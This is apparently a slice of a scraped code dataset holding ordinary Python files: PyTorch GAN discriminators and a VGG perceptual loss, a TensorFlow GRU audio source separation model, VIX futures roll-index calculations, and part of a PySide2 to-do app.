8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n\n return self.model(input)\n\n\nclass NoNormAttentionDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]):\n super(NoNormAttentionDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n self.n_layers = n_layers\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n self.sequence = [\n nn.Conv2d(input_nc + 1, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n self.atten_down_sequence = [nn.MaxPool2d(2)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n self.sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n self.atten_down_sequence += [nn.MaxPool2d(2)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n self.sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n self.sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n self.sequence += [nn.Sigmoid()]\n\n # self.model = nn.Sequential(*self.sequence)\n\n def forward(self, input, atten):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n atten_squence = [atten]\n\n for n in range(0, self.n_layers):\n atten_squence.append(self.atten_down_sequence[n](atten_squence[n]))\n\n x = self.sequence[0](torch.cat([input, atten_squence[0]], 1))\n x = x * atten_squence[1]\n for n in range(1, self.n_layers):\n x = self.sequence[n](x)\n x = x * atten_squence[n + 1]\n\n x = self.sequence[self.n_layers](x)\n x = x * atten_squence[-1]\n\n out = self.sequence[-1](x)\n return out\n\n\nclass FCDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[], patch=False):\n super(FCDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n self.use_sigmoid = use_sigmoid\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n if patch:\n self.linear = nn.Linear(7 * 7, 1)\n else:\n self.linear = nn.Linear(13 * 13, 1)\n if use_sigmoid:\n self.sigmoid = nn.Sigmoid()\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n batchsize = input.size()[0]\n output = self.model(input)\n output = output.view(batchsize, -1)\n # print(output.size())\n output = self.linear(output)\n if self.use_sigmoid:\n print(\"sigmoid\")\n output = self.sigmoid(output)\n return output\n\n\nclass Vgg16(nn.Module):\n def __init__(self):\n super(Vgg16, self).__init__()\n self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1)\n self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1)\n\n self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)\n self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1)\n\n self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)\n self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)\n\n self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1)\n self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n\n self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1)\n\n def forward(self, X, opt):\n h = F.relu(self.conv1_1(X), inplace=True)\n h = F.relu(self.conv1_2(h), inplace=True)\n # relu1_2 = h\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv2_1(h), inplace=True)\n h = F.relu(self.conv2_2(h), inplace=True)\n # relu2_2 = h\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv3_1(h), inplace=True)\n h = F.relu(self.conv3_2(h), inplace=True)\n h = F.relu(self.conv3_3(h), inplace=True)\n # relu3_3 = h\n if opt.vgg_choose != \"no_maxpool\":\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n h = F.relu(self.conv4_1(h), inplace=True)\n relu4_1 = h\n h = F.relu(self.conv4_2(h), inplace=True)\n relu4_2 = h\n conv4_3 = self.conv4_3(h)\n h = F.relu(conv4_3, inplace=True)\n relu4_3 = h\n\n if opt.vgg_choose != \"no_maxpool\":\n if opt.vgg_maxpooling:\n h = F.max_pool2d(h, kernel_size=2, stride=2)\n\n relu5_1 = F.relu(self.conv5_1(h), inplace=True)\n relu5_2 = F.relu(self.conv5_2(relu5_1), inplace=True)\n conv5_3 = self.conv5_3(relu5_2)\n h = F.relu(conv5_3, inplace=True)\n relu5_3 = h\n if opt.vgg_choose == \"conv4_3\":\n return conv4_3\n elif opt.vgg_choose == \"relu4_2\":\n return relu4_2\n elif opt.vgg_choose == \"relu4_1\":\n return relu4_1\n elif opt.vgg_choose == \"relu4_3\":\n return relu4_3\n elif opt.vgg_choose == \"conv5_3\":\n return conv5_3\n elif opt.vgg_choose == \"relu5_1\":\n return relu5_1\n elif opt.vgg_choose == \"relu5_2\":\n return relu5_2\n elif opt.vgg_choose == \"relu5_3\" or \"maxpool\":\n return relu5_3\n\n\ndef vgg_preprocess(batch, opt):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim=1)\n batch = torch.cat((b, g, r), dim=1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n if opt.vgg_mean:\n mean = tensortype(batch.data.size())\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return batch\n\n\nclass PerceptualLoss(nn.Module):\n def __init__(self, opt):\n super(PerceptualLoss, self).__init__()\n self.opt = opt\n self.instancenorm = nn.InstanceNorm2d(512, affine=False)\n\n def compute_vgg_loss(self, vgg, img, target):\n img_vgg = vgg_preprocess(img, self.opt)\n target_vgg = vgg_preprocess(target, self.opt)\n img_fea = vgg(img_vgg, self.opt)\n target_fea = vgg(target_vgg, self.opt)\n if self.opt.no_vgg_instance:\n return torch.mean((img_fea - target_fea) ** 2)\n else:\n return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2)\n\n\ndef load_vgg16(model_dir, gpu_ids):\n \"\"\" Use the model from https://github.com/abhiskk/fast-neural-style/blob/master/neural_style/utils.py \"\"\"\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n if not os.path.exists(os.path.join(model_dir, 'vgg16.weight')):\n if not os.path.exists(os.path.join(model_dir, 'vgg16.t7')):\n os.system('wget https://www.dropbox.com/s/76l3rt4kyi3s8x7/vgg16.t7?dl=1 -O ' + os.path.join(model_dir,\n 'vgg16.t7'))\n vgglua = load_lua(os.path.join(model_dir, 'vgg16.t7'))\n vgg = Vgg16()\n for (src, dst) in zip(vgglua.parameters()[0], vgg.parameters()):\n dst.data[:] = src\n torch.save(vgg.state_dict(), os.path.join(model_dir, 'vgg16.weight'))\n vgg = Vgg16()\n # vgg.cuda()\n vgg.cuda(device=gpu_ids[0])\n vgg.load_state_dict(torch.load(os.path.join(model_dir, 'vgg16.weight')))\n vgg = torch.nn.DataParallel(vgg, gpu_ids)\n return vgg\n\n\nclass max_operation(nn.Module):\n def __init__(self):\n super(max_operation, self).__init__()\n # self.bias = Variable(torch.FloatTensor([0.0]), requires_grad=True).cuda()\n # 初始化\n\n def forward(self, img):\n img = img.cpu().float().numpy()\n x = np.maximum(img[:, :, :-1, :], img[:, :, 1:, :])\n x = np.concatenate((x, np.expand_dims(img[:, :, -1, :], 2)), 2)\n\n y = np.maximum(x[:, :, :, :-1], x[:, :, :, 1:])\n y = np.concatenate((y, np.expand_dims(x[:, :, :, -1], 3)), 3)\n\n y = torch.from_numpy(y).cuda()\n\n return y\n\n\nclass edge_operation(nn.Module):\n def __init__(self):\n super(edge_operation, self).__init__()\n\n def __call__(self, img):\n img = img.cpu().float().numpy()\n\n x1 = img[:, :, :-1, :] - img[:, :, 1:, :]\n x1 = np.concatenate((x1, np.expand_dims(img[:, :, -1, :], 2)), 2)\n\n x2 = img[:, :, 1:, :] - img[:, :, :-1, :]\n x2 = np.concatenate((np.expand_dims(img[:, :, 0, :], 2), x2), 2)\n\n y1 = img[:, :, :, :-1] - img[:, :, :, 1:]\n y1 = np.concatenate((y1, np.expand_dims(img[:, :, :, -1], 3)), 3)\n\n y2 = img[:, :, :, 1:] - img[:, :, :, :-1]\n y2 = np.concatenate((np.expand_dims(img[:, :, :, 0], 3), y2), 3)\n\n img = (np.abs(x1) + np.abs(x2) + np.abs(y1) + np.abs(y2)) / 4.0\n\n y = torch.from_numpy(img).cuda()\n\n return y\n","repo_name":"KarelZhang/CSDNet-CSDGAN","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":31066,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"94"} +{"seq_id":"26095482761","text":"import tensorflow as tf\nimport numpy as np\n# import tensorflow.compat.v1 as tf1\nfrom tensorflow import keras as k\n\nn_fft=1024\nEPOCHS=10\nBS=64\nnum_hidden_units = [256, 256, 256]\nnum_features = n_fft // 2 + 1\n#[batch_size, n_frames (time), n_frequencies]\nx_mixed=np.random.rand(64,10,513)\npath=r\"E:\\FinalDS\\mix\\*.npy\"\nmodelpath=r\"C:\\Users\\Axiomatize\\Desktop\\Singing_Voice_Separation_RNN-master\\BossModel\"\n\ndef load(mixpath):\n vocpath=tf.strings.regex_replace(mixpath,'mix','voc')\n dtype=16\n voc = tf.io.decode_raw(tf.io.read_file(vocpath), tf.float16)\n remove_len = 1024//dtype\n voc = voc[remove_len:]\n voc=tf.reshape(voc,(-1,1,513))\n voc=voc[:1000]\n voc=tf.reshape(voc,(-1,10,513))\n\n voc=tf.cast(voc,tf.float32)\n mix=voc;mel=voc\n # mix2=tf.cast(np.random.rand(64,10,513),tf.float32)\n # mix3=tf.cast(np.random.rand(64,10,513),tf.float32)\n return (mix,(voc,mel))\n\ntrainset=(\n tf.data.Dataset\n .list_files(path)\n .map(load)\n .flat_map(lambda mix, voc: tf.data.Dataset.zip((\n tf.data.Dataset.from_tensor_slices(mix),\n zip(tf.data.Dataset.from_tensor_slices(voc[0]),tf.data.Dataset.from_tensor_slices(voc[1])))))\n .batch(BS,drop_remainder=True,num_parallel_calls=tf.data.AUTOTUNE)\n .prefetch(tf.data.AUTOTUNE))\n\nx_mixed=k.Input(shape=(10,513))\nrnn_layer = tf.keras.layers.RNN([tf.keras.layers.GRUCell(256),\n tf.keras.layers.GRUCell(256),\n tf.keras.layers.GRUCell(256)],\n return_sequences=True,\n return_state=True, \n dtype = tf.float32)\noutputs = rnn_layer(x_mixed)\noutputs=outputs[0]\n\ny_hat_src1 = tf.keras.layers.Dense (units = num_features,activation ='relu')(outputs)\n\ny_hat_src2 = tf.keras.layers.Dense (units = num_features,activation ='relu')(outputs)\n\ny_tilde_src1 = y_hat_src1 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * x_mixed\ny_tilde_src2 = y_hat_src2 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * x_mixed\n\nmodel = k.Model(inputs=x_mixed, outputs=[y_tilde_src1,y_tilde_src2])\n\nadam=tf.keras.optimizers.Adam(learning_rate=0.001)\n\nmodel.compile(loss=[k.losses.MeanSquaredError(),k.losses.MeanSquaredError()],optimizer=adam)\n# model = tf.keras.models.load_model(modelpath)\nmodel.summary()\n# H = model.fit(\n# \tx=trainset,\n# \tepochs=EPOCHS)\n\n# model.save(\"BossModel\")\n","repo_name":"120205690/Audio-Source-Separation","sub_path":"Code/tf2model.py","file_name":"tf2model.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11559865873","text":"\r\n#********************************************************************\r\n# This file contains the functions for Volatility Strategies\r\n#********************************************************************\r\n#*****************************************************************************\r\n# IMPORTS\r\n#*****************************************************************************\r\n\r\n#*************************\r\n# IMPORT PYTHON LIBRAIRIES\r\n#*************************\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\nfrom os import chdir\r\nimport os\r\nimport sqlite3\r\n\r\n#**********************************\r\n# IMPORT NYC ENGINEERING LIBRAIRIES\r\n#**********************************\r\nos.chdir(r'K:\\ED_ExcelTools\\Transfert\\Structuring\\Proprietary Indices\\Python Script\\US Structuring Libraries')\r\nfrom class_CalendarUS import * \r\nfrom DB_functions import *\r\nfrom class_Strategy import *\r\n\r\n# this function transforms an excel date to a datetime\r\ndef minimalist_xldate_as_datetime(xldate, datemode):\r\n # datemode: 0 for 1900-based, 1 for 1904-based\r\n return (\r\n datetime.datetime(1899, 12, 30)\r\n + datetime.timedelta(days=xldate + 1462 * datemode)\r\n )\r\n# this function transforms datetime to an excel date\r\ndef inv_minimalist_xldate_as_datetime(date):\r\n # datemode: 0 for 1900-based, 1 for 1904-based\r\n return ((date -datetime.datetime(1899, 12, 30)).days\r\n )\r\n \r\n#**************************\r\n#**************************\r\n#** US VERSION\r\n#**************************\r\n#************************** \r\n \r\n#*****************************************************\r\n# US LAST TRADING DAY CALENDAR\r\n# **************************************************** \r\n#CBOE_VIX_FUT_Calendar: generates the FirstDayTrading // LastDayTrading // SettlementDate between the two years\r\n# The CBOE settlement date of a month is defined as follows:\r\n# The Wednesday 30-days prior to the 3rd Friday of next month\r\n# If the 3rd Friday of next month is not a BD: find the first BD-prior\r\n# If the day 30-prior is not a BD: find the first BD-prior\r\n \r\ndef CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd):\r\n #//US calendar creation\r\n startDate = datetime.datetime(iYearBegin-1,1,1) # we want a bigger interval\r\n endDate= datetime.datetime(iYearEnd+1,12,31) # we want a bigger interval\r\n calendarUS = Calendar(startDate,endDate)\r\n ExistingDates=calendarUS.BusinessDaysFixingDates\r\n lLastTradingDay=[]\r\n lSettlementDate=[]\r\n for k in range(0,iYearEnd+1-iYearBegin+1+1):\r\n year = iYearBegin-1+k\r\n #finds the settlement date and last trading date for each month\r\n for l in range(1,13):\r\n if l<12:\r\n month=l+1\r\n else:\r\n month=1\r\n year+=1\r\n #finds the 3rd friday of next month\r\n FirstDay = datetime.datetime(year,month,1).weekday()\r\n if FirstDay==5:\r\n Delay = 6\r\n elif FirstDay==6:\r\n Delay =5\r\n else:\r\n Delay = 4-FirstDay\r\n NextMonth3rdFriday = datetime.datetime(year,month,1+Delay+14)\r\n #Check if it is a business date:\r\n if ExistingDates.count(NextMonth3rdFriday)==0:\r\n NextMonth3rdFriday = datetime.datetime(year,month,1+Delay+13)\r\n #Find the Wednesday 30 days prior\r\n ExcelDate = inv_minimalist_xldate_as_datetime(NextMonth3rdFriday)\r\n ExcelDate-=30\r\n Settlement_Date= minimalist_xldate_as_datetime(float(ExcelDate),0)\r\n if ExistingDates.count(Settlement_Date)==0:\r\n Settlement_Date = calendarUS.addBusinessDays(-1,Settlement_Date)\r\n #carefull, the rule changed on November 14\r\n if Settlement_Date>=datetime.datetime(2014,11,1):\r\n Last_Trading_Date=Settlement_Date\r\n else: \r\n Last_Trading_Date= calendarUS.addBusinessDays(-1,Settlement_Date)\r\n #save\r\n lSettlementDate.append(Settlement_Date)\r\n lLastTradingDay.append(Last_Trading_Date) \r\n dfCBOE_VIX_FUT_Calendar=pd.DataFrame({'FirstTradingDay':lLastTradingDay,'LastTradingDay':lLastTradingDay,'SettlementDate':lSettlementDate})\r\n dfCBOE_VIX_FUT_Calendar['LastTradingDay']=dfCBOE_VIX_FUT_Calendar['LastTradingDay'].shift(-1)\r\n dfCBOE_VIX_FUT_Calendar['SettlementDate']=dfCBOE_VIX_FUT_Calendar['SettlementDate'].shift(-1)\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar.dropna()\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar[dfCBOE_VIX_FUT_Calendar['FirstTradingDay']>=datetime.datetime(iYearBegin-1,12,1)]\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar[dfCBOE_VIX_FUT_Calendar['FirstTradingDay']<=datetime.datetime(iYearEnd+1,1,1)]\r\n dfCBOE_VIX_FUT_Calendar.reset_index(inplace=True)\r\n dfCBOE_VIX_FUT_Calendar=dfCBOE_VIX_FUT_Calendar.drop('index',1)\r\n dfCBOE_VIX_FUT_Calendar['LengthPeriod']=0.0\r\n for k in range(0,len(dfCBOE_VIX_FUT_Calendar)):\r\n FirstDay=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][k]\r\n #exlude the first trading day, include the last one\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n LastDay=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][k]\r\n dfCBOE_VIX_FUT_Calendar['LengthPeriod'][k] = calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n return dfCBOE_VIX_FUT_Calendar \r\n \r\n#*****************************************************\r\n# US SHORT TERM ROLL\r\n# **************************************************** \r\n \r\nclass US_ST_Rolled_Vol_Index_NTX():\r\n def __init__(self,Contract1,Contract2,Contract3,dateBegin,dateEnd):\r\n \r\n Contract_list=[Contract1,Contract2,Contract3]\r\n calendar=Calendar(dateBegin, dateEnd).BusinessDaysFixingDates\r\n newStrat= Asset_Price_getPrices(Contract_list,['Last_Price'],dateBegin,dateEnd,False,calendar)\r\n newStrat=newStrat.fillna(method='ffill')\r\n newStrat=newStrat.dropna()\r\n\r\n #read data\r\n \r\n startDate=newStrat.index[0]\r\n endDate=newStrat.index[len(newStrat)-1]\r\n iYearBegin=startDate.year\r\n iYearEnd=endDate.year\r\n \r\n #create CBOE Calendar\r\n dfCBOE_VIX_FUT_Calendar=CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd)\r\n lRollDates = dfCBOE_VIX_FUT_Calendar['LastTradingDay'].drop_duplicates().tolist()\r\n calendarUS = Calendar(startDate,endDate)\r\n #convert in datetime\r\n newStrat['Dates_Format']=newStrat.index\r\n #find the roll period for each date\r\n l=0\r\n while dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]:\r\n l+=1\r\n newStrat['FirstTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][l]\r\n newStrat['LastTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]\r\n newStrat['SettlementDate'][k]=dfCBOE_VIX_FUT_Calendar['SettlementDate'][l]\r\n newStrat['t'][k]=dfCBOE_VIX_FUT_Calendar['LengthPeriod'][l]\r\n if lRollDates.count(today)==1:\r\n newStrat['IsRoll'][k]=1 \r\n newStrat['r']=0.0\r\n for k in range(0,len(newStrat)):\r\n FirstDay=newStrat['Dates_Format'][k]\r\n LastDay = newStrat['LastTradingDay'][k]\r\n if FirstDay==LastDay:\r\n newStrat['r'][k]=0\r\n else: \r\n #from the next BD to the last trading day\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n newStrat['r'][k]=calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n #computes weights \r\n newStrat['W1']=newStrat['r']/newStrat['t']\r\n newStrat['W2']=(newStrat['t']-newStrat['r'])/newStrat['t']\r\n\r\n newStrat['Index']=100.0\r\n for k in range(1,len(newStrat)):\r\n if newStrat['Dates_Format'][k-1]==newStrat['LastTradingDay'][k-1]:\r\n #Yesterday was the roll day: W2 in the second contract= W2 in the first contract\r\n w1=newStrat['W2'][k-1]\r\n w2=newStrat['W1'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n ValueYesterday= w1*U1_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]\r\n else:\r\n w1=newStrat['W1'][k-1]\r\n w2=newStrat['W2'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract1)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]\r\n newStrat['Index'][k]=newStrat['Index'][k-1]*ValueToday/ValueYesterday\r\n \r\n self.Index=newStrat\r\n \r\n\r\nclass US_MT_Rolled_Vol_Index_NTX():\r\n def __init__(self,Contract1,Contract2,Contract3,Contract4,Contract5,dateBegin,dateEnd):\r\n Contract_list=[Contract1,Contract2,Contract3,Contract4,Contract5]\r\n calendar=Calendar(dateBegin, dateEnd).BusinessDaysFixingDates\r\n newStrat= Asset_Price_getPrices(Contract_list,['Last_Price'],dateBegin,dateEnd,False,calendar)\r\n newStrat=newStrat.fillna(method='ffill')\r\n newStrat=newStrat.dropna()\r\n \r\n #read data\r\n \r\n startDate=newStrat.index[0]\r\n endDate=newStrat.index[len(newStrat)-1]\r\n iYearBegin=startDate.year\r\n iYearEnd=endDate.year\r\n \r\n #create CBOE Calendar\r\n dfCBOE_VIX_FUT_Calendar=CBOE_VIX_FUT_Calendar(iYearBegin,iYearEnd)\r\n lRollDates = dfCBOE_VIX_FUT_Calendar['LastTradingDay'].drop_duplicates().tolist()\r\n calendarUS = Calendar(startDate,endDate)\r\n #convert in datetime\r\n newStrat['Dates_Format']=newStrat.index\r\n l=0\r\n while dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]:\r\n l+=1\r\n newStrat['FirstTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['FirstTradingDay'][l]\r\n newStrat['LastTradingDay'][k]=dfCBOE_VIX_FUT_Calendar['LastTradingDay'][l]\r\n newStrat['SettlementDate'][k]=dfCBOE_VIX_FUT_Calendar['SettlementDate'][l]\r\n newStrat['t'][k]=dfCBOE_VIX_FUT_Calendar['LengthPeriod'][l]\r\n if lRollDates.count(today)==1:\r\n newStrat['IsRoll'][k]=1\r\n \r\n newStrat['r']=0.0\r\n for k in range(0,len(newStrat)):\r\n FirstDay=newStrat['Dates_Format'][k]\r\n LastDay = newStrat['LastTradingDay'][k]\r\n if FirstDay==LastDay:\r\n newStrat['r'][k]=0\r\n else: \r\n #from the next BD to the last trading day\r\n FirstDay=calendarUS.addBusinessDays(1,FirstDay)\r\n newStrat['r'][k]=calendarUS.nbBusinessDaysBetweenTwoDates(FirstDay,LastDay)\r\n \r\n newStrat['W1']=newStrat['r']/newStrat['t']\r\n newStrat['W2']=1.0\r\n newStrat['W3']=1.0\r\n newStrat['W4']=(newStrat['t']-newStrat['r'])/newStrat['t']\r\n \r\n \r\n newStrat['Index']=100.0\r\n for k in range(1,len(newStrat)):\r\n if newStrat['Dates_Format'][k-1]==newStrat['LastTradingDay'][k-1]:\r\n #Yesterday was the roll day: W2 in the second contract= W2 in the first contract\r\n w1=1.0\r\n w2=1.0\r\n w3=1.0\r\n w4=0.0\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n U3_yesterday=newStrat[\"Last_Price.\"+str(Contract4)][k-1]\r\n U4_yesterday=newStrat[\"Last_Price.\"+str(Contract5)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday+w3*U3_yesterday\r\n ValueToday= w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]+w3*newStrat[\"Last_Price.\"+str(Contract3)][k]\r\n else:\r\n w1=newStrat['W1'][k-1]\r\n w2=1.0\r\n w3=1.0\r\n w4=newStrat['W4'][k-1]\r\n U1_yesterday = newStrat[\"Last_Price.\"+str(Contract1)][k-1]\r\n U2_yesterday=newStrat[\"Last_Price.\"+str(Contract2)][k-1]\r\n U3_yesterday=newStrat[\"Last_Price.\"+str(Contract3)][k-1]\r\n U4_yesterday=newStrat[\"Last_Price.\"+str(Contract4)][k-1]\r\n ValueYesterday= w1*U1_yesterday+w2*U2_yesterday+w3*U3_yesterday+w4*U4_yesterday\r\n ValueToday = w1*newStrat[\"Last_Price.\"+str(Contract1)][k]+w2*newStrat[\"Last_Price.\"+str(Contract2)][k]+w3*newStrat[\"Last_Price.\"+str(Contract3)][k]+w4*newStrat[\"Last_Price.\"+str(Contract4)][k]\r\n newStrat['Index'][k]=newStrat['Index'][k-1]*ValueToday/ValueYesterday\r\n \r\n self.Index=newStrat\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ShenruiJin/Strategy","sub_path":"LICENSE.md/CBOE_Rolled_Contracts.py","file_name":"CBOE_Rolled_Contracts.py","file_ext":"py","file_size_in_byte":13899,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"41681692322","text":"import platform\n\nfrom PySide2 import QtWidgets, QtGui, QtCore\n\nimport package.api.task\n\nCOLORS = {False: (235, 64, 52), True: (160, 237, 83)}\n\n\nclass TaskItem(QtWidgets.QListWidgetItem):\n def __init__(self, text, done, list_widget):\n super().__init__(text)\n\n self.list_widget = list_widget\n self.done = done\n self.text = text\n self.setSizeHint(QtCore.QSize(self.sizeHint().width(), 50))\n self.set_background_color()\n self.list_widget.addItem(self)\n \n def toggle_state(self):\n self.done = not self.done\n self.set_background_color()\n package.api.task.set_task_status(content=self.text, done=self.done)\n\n def set_background_color(self):\n color = COLORS.get(self.done)\n self.setBackgroundColor(QtGui.QColor(*color))\n style_sheet = \"QListView::item:selected {background: rgb(\"\n style_sheet += f\"{color[0]}, {color[1]}, {color[2]});\"\n style_sheet += \"color: rgb(0, 0, 0);\"\n style_sheet += \"}\"\n self.list_widget.setStyleSheet(style_sheet)\n\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self, ctx):\n super().__init__()\n\n self.width = 250\n self.height = 0\n self.ctx = ctx\n self.setup_ui()\n self.populate_tasks()\n\n def setup_ui(self):\n self.create_widgets()\n self.create_layouts()\n self.modify_widgets()\n self.add_widgets_to_layouts()\n self.setup_connections()\n self.setup_tray()\n\n def setup_tray(self):\n self.tray = QtWidgets.QSystemTrayIcon()\n\n icon = QtGui.QIcon(self.ctx.get_resource(\"icon.png\"))\n\n self.tray.setIcon(icon)\n self.tray.setVisible(True)\n\n self.tray.activated.connect(self.tray_icon_click)\n\n def create_widgets(self):\n self.lw_tasks = QtWidgets.QListWidget()\n self.frm_options = QtWidgets.QFrame()\n self.btn_add = QtWidgets.QPushButton()\n self.btn_clean = QtWidgets.QPushButton()\n self.btn_quit = QtWidgets.QPushButton()\n\n def modify_widgets(self):\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.main_layout.setSpacing(0)\n \n self.setStyleSheet(\"border: none;\")\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)\n \n self.lw_tasks.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.lw_tasks.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n\n self.btn_add.setIcon(QtGui.QIcon(self.ctx.get_resource(\"add.svg\")))\n self.btn_clean.setIcon(QtGui.QIcon(self.ctx.get_resource(\"clean.svg\")))\n self.btn_quit.setIcon(QtGui.QIcon(self.ctx.get_resource(\"close.svg\")))\n\n def create_layouts(self):\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.frm_options_layout = 